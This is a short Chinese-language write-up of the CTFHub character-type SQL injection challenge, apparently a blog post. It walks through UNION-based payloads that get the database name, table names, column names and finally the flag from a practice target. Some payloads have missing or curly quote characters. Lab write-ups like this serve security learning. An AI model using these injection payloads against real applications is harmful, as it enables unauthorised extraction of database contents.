CTFHub SQL字符型注入

CTFHub SQL字符型注入

题目说的很清楚,字符型注入,需要注意引号和注释
CTFHub SQL字符型注入_第1张图片
和整数型注入一样,回显只有两处:ID和Data,直接上联合查询

123union select database(),2 #

CTFHub SQL字符型注入_第2张图片得到数据库,接着查表

123' union select group_concat(table_name),3 from information_schema.tables where table_schema='sqli' #

CTFHub SQL字符型注入_第3张图片得到表名,继续拿字段名

123union select group_concat(column_name) ,3 from information_schema.columns where table_name='flag' #

CTFHub SQL字符型注入_第4张图片拿到字段名,直接拿flag
123’ union select flag,3 from sqli.flag #
CTFHub SQL字符型注入_第5张图片
id=123在数据库里不存在,这样回显为NULL,换成其他数字都行,不然没有回显union select查询位置

你可能感兴趣的:(WriteUp)